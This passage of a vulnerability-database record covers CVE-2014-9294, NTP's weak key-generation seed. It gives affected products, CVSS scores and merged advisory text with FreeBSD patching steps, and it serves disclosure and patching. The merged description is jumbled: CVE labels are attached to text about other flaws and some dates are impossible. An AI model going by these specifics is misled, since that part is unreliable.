"model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tcp/ip services for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.7" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "advanced server ha8000cr", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "0" }, { "model": "vipr srm", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "3.6.0" }, { "model": "m\u0026r", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.5" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex social", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server base", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server 2.0mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "62150" }, { "model": "virtual systems operations center for vpe project", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape back office", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell ran management system wireless", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs invicta series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "transaction encryption device", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "service control engines system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "remote network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "remote conditional access system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powervu network center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkey encryption server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "iptv service delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios xr for cisco network convergence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "international digital network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "finesse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "explorer controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dncs application server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital transport adapter control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common download server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "command server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mxg2 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints 10\" touch panel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "autobackup server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "network time protocol", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": "4.2.8" }, { "model": "network time protocol 4.2.7p230", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "junos os 14.2r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x55-d16", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x50-d90", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3x48-d15", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d35", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d50", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud entry fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.17" }, { "model": "vipr srm", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "3.6.1" }, { "model": "m\u0026r 6.5u1", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "CNNVD", "id": "CNNVD-201412-455" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.7", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-9294" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stephen Roettger of the Google Security Team", "sources": [ { "db": "BID", "id": "71762" } ], "trust": 0.3 }, "cve": "CVE-2014-9294", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-9294", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-9294", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-9294", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201412-455", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007351" }, { "db": "CNNVD", "id": "CNNVD-201412-455" }, { "db": "NVD", "id": "CVE-2014-9294" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "util/ntp-keygen.c in ntp-keygen in NTP before 4.2.7p230 uses a weak RNG seed, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) Has been identified. http://cwe.mitre.org/data/definitions/338.htmlA brute force attack by a third party (Brute force attack) May break the cryptographic protection mechanism. NTP is prone to a predictable random number generator weakness. \nAn attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server. \nCorrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE)\n 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3)\n 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15)\n 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE)\n 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7)\n 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17)\n 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24)\n 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE)\n 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21)\nCVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nII. [CVE-2014-9293]\nThe ntp-keygen(8) utility is also affected by a similar issue. \n[CVE-2014-9294]\n\nWhen Autokey Authentication is enabled, for example if ntp.conf(5) contains\na \u0027crypto pw\u0027 directive, a remote attacker can send a carefully\ncrafted packet that can overflow a stack buffer. [CVE-2014-9296]\n\nIII. Impact\n\nThe NTP protocol uses keys to implement authentication. The weak\nseeding of the pseudo-random number generator makes it easier for an\nattacker to brute-force keys, and thus may broadcast incorrect time stamps\nor masquerade as another time server. [CVE-2014-9295]\n\nIV. Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected. Because the issue may lead to remote root compromise, the\nFreeBSD Security Team recommends system administrators to firewall NTP\nports, namely tcp/123 and udp/123 when it is not clear that all systems\nhave been patched or have ntpd(8) stopped. \n\nV. \n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc\n# gpg --verify ntp.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the ntpd(8) daemons, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r276073\nreleng/8.4/ r276154\nstable/9/ r276073\nreleng/9.1/ r276155\nreleng/9.2/ r276156\nreleng/9.3/ r276157\nstable/10/ r276072\nreleng/10.0/ r276158\nreleng/10.1/ r276159\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. This situation may be exploitable by an attacker\n (CVE-2014-9296). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n 